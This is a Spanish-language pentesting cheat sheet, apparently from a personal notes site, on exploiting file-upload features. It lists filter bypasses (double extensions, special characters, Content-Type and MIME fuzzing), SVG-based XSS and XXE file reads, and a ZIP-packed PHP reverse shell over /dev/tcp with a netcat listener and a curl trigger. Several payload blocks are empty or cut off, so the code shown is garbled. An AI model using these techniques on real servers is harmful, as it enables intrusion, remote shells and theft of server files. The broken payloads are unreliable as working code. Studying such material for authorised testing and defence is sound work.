# File upload ## General 1\) Realizar carga de archivo e identificar: * Lugar de almacenamiento o ubicación donde es utilizado el archivo. * Fuzzing de directorios. * Forzar mensajes de error. * Cargando un archivo con un nombre existente. * Enviar dos solicitudes idénticas simultáneamente. * Cargar un archivo con un nombre demasiado largo, por ejemplo de 5000 caracteres. * Nombre con el cual es guardado el archivo. 2\) Identificar la tecnología utilizada. 3\) Comprobar la ejecución de comandos. ```php # PHP ``` 4\) Subida de web shells y reverse shells. * [Web shells](https://pentesting.mrw0l05zyn.cl/explotacion/shells/general#web-shells) * [Reverse shells](https://pentesting.mrw0l05zyn.cl/explotacion/shells/general#reverse-shells) ## Bypass de filtros ### Validación del lado del cliente Utilizar funcionalidad de "anulaciones locales" de las "herramientas para desarrolladores" del navegador. ### Validación de extensiones con lista negra (blacklist) y blanca (whitelist) Identificar extensiones permitidas realizando fuzzing. Listas de extensiones web comunes: * [SecLists](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) * [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files) * Burp Suite -> Intruder -> Payload options -> Extensions list #### Doble extensión Si `.jpg` es una extensión permitida se agrega al final del nombre del archivo seguido por la extensión del archivo a ejecutar, por ejemplo: `shell.jpg.php`. #### Doble extensión inversa Si `.jpg` es una extensión permitida se mantiene al final del nombre del archivo y se antepone a esta la extensión del archivo a ejecutar, por ejemplo: `shell.php.jpg`. #### Caracteres especiales * [Special character generator](https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/file-upload/specialCharacterGenerator.sh) ``` %20 %0a %00 %0d0a / .\ . … : ``` ### Validación de tipo de contenido (Content-Type) Identificar los tipos de contenido (`Content-Type`) permitidos realizando fuzzing. Listas de tipos de contenido (`Content-Type`) web: * [SecLists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) ### Validación de MIME-Type Identificar los MIME-Type permitidos realizando fuzzing. Listas de MIME-Type de archivos: * [Wikipedia](https://en.wikipedia.org/wiki/List_of_file_signatures) ## Desde file upload a otras vulnerabilidades ### SVG #### Cross-site scripting (XSS) ```xml ``` #### XML external entity (XXE) Lectura de archivo general. ```xml # Linux/Unix ]> &xxe; ]> &xxe; # Windows ]> &xxe; ``` Lectura de archivo PHP. ```xml ">]> &xxe; ``` ### ZIP #### Reverse shell Creación de reverse shell. {% code title="reverseshell.php" %} ```php & /dev/tcp// 0>&1'"); ?> ``` {% endcode %} Generación de archivo `.zip` con reverse shell. ```bash zip reverseshell.zip reverseshell.php ``` Ejecución de Netcat en máquina atacante en modo escucha. ```sh nc -lvnp ``` Subir el archivo `reverseshell.zip` al servidor web objetivo, revisar si el archivo es descomprimido y ejecutar la reverse shell. ```sh curl http:///reverseshell.php ```